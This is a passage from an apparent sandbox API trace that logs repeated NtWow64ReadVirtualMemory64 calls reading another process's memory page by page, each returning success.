BaseAddress=0x77f3f000, Buffer=0x7ff9, BufferSize=0x286f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f40000, Buffer=0x7ff9, BufferSize=0x2870000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f41000, Buffer=0x7ff9, BufferSize=0x2871000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f42000, Buffer=0x7ff9, BufferSize=0x2872000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f43000, Buffer=0x7ff9, BufferSize=0x2873000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f44000, Buffer=0x7ff9, BufferSize=0x2874000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f45000, Buffer=0x7ff9, BufferSize=0x2875000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f46000, Buffer=0x7ff9, BufferSize=0x2876000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.073] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f47000, Buffer=0x7ff9, BufferSize=0x2877000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f48000, Buffer=0x7ff9, BufferSize=0x2878000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f49000, Buffer=0x7ff9, BufferSize=0x2879000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4a000, Buffer=0x7ff9, BufferSize=0x287a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4b000, Buffer=0x7ff9, BufferSize=0x287b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4c000, Buffer=0x7ff9, BufferSize=0x287c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4d000, Buffer=0x7ff9, BufferSize=0x287d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4e000, Buffer=0x7ff9, BufferSize=0x287e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.074] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f4f000, Buffer=0x7ff9, BufferSize=0x287f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.075] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f50000, Buffer=0x7ff9, BufferSize=0x2880000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.075] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f51000, Buffer=0x7ff9, BufferSize=0x2881000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.075] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f52000, Buffer=0x7ff9, BufferSize=0x2882000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.075] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f53000, Buffer=0x7ff9, BufferSize=0x2883000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.075] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f54000, Buffer=0x7ff9, BufferSize=0x2884000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.075] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f55000, Buffer=0x7ff9, BufferSize=0x2885000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f56000, Buffer=0x7ff9, BufferSize=0x2886000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f57000, Buffer=0x7ff9, BufferSize=0x2887000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f58000, Buffer=0x7ff9, BufferSize=0x2888000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f59000, Buffer=0x7ff9, BufferSize=0x2889000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5a000, Buffer=0x7ff9, BufferSize=0x288a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5b000, Buffer=0x7ff9, BufferSize=0x288b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5c000, Buffer=0x7ff9, BufferSize=0x288c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5d000, Buffer=0x7ff9, BufferSize=0x288d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.076] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5e000, Buffer=0x7ff9, BufferSize=0x288e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f5f000, Buffer=0x7ff9, BufferSize=0x288f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f60000, Buffer=0x7ff9, BufferSize=0x2890000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f61000, Buffer=0x7ff9, BufferSize=0x2891000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f62000, Buffer=0x7ff9, BufferSize=0x2892000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f63000, Buffer=0x7ff9, BufferSize=0x2893000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f64000, Buffer=0x7ff9, BufferSize=0x2894000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f65000, Buffer=0x7ff9, BufferSize=0x2895000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.077] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f66000, Buffer=0x7ff9, BufferSize=0x2896000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f67000, Buffer=0x7ff9, BufferSize=0x2897000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2898000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2899000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x289a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x289b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x289c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x289d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x289e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.078] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x289f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x28a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x28a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x28a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x28a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x28a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x28a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x28a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x28a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.079] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x28a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x28a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x28aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x28ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x28ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x28ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x28ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.080] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x28af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x28b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x28b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x28b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x28b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x28b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x28b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.081] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x28b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x28b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x28b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x28b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x28ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x28bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x28bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.082] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x28bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x28be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x28bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x28c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x28c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x28c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x28c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x28c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.083] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x28c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x28c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x28c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x28c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x28c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x28ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x28cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x28cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.084] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x28cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x28ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x28cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x28d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x28d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x28d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x28d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x28d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x28d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.085] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x28d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x28d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x28d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x28d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x28da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x28db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x28dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x28dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.086] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x28de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x28df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.087] 